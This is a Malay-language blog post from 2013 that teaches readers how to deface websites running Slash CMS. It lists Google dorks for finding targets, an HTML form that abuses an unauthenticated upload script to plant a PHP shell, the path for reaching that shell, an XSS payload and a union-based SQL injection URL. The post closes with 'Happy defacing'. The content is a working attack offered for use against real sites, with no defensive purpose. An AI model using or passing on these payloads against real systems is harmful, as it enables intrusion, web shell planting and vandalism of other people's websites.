Wednesday, 27 March 2013

Slash CMS Multiple Vulnerability


Assalamualaikum dan salam sejahtera.Kali ini aku nak ajar korang deface website dengan exploit Slash CMS.webapps ini terdedah kepada multiple vulnerability iaitu Remote File Upload, XSS dan SQLi.

Ok jom mula~

Google Dork :

"Slash CMS"
@
inurl:slash-cms

note: korang reka sendiri dork ;)

Remote File Upload

1. Korang buat satu file upload.php dan upload ke dalam free hosting atau mana2 saja.
code :



<form action="http://www.target.com/slash-cms/core/plugins/ajaxupload/ajaxupload.php" method="post" enctype="multipart/form-data">
<input type="file" name="sl_userfile">
<input type="submit" value="Upload"></form>
Uploaded File Path: /tmp/{Filename}.php


Gantikan www.target.com kepada link target website korang.



Nak tengok shell :
www.target.com/tmp/shell.php



XSS
http://www.target.com/slash-cms/index.php?mod=sl_pages&id=<script>alert(1)</script>


SQL Injection
http://www.target.com/slash-cms/index.php?mod=sl_pages&id=[SQLI]

Contoh:http://www.target.com/slash-cms/index.php?mod=sl_pages&id=-2+union+select+1,2,user(),database(),5,6



Itu saja exploit kali ini..Happy defacing...
Item Reviewed: Slash CMS Multiple Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com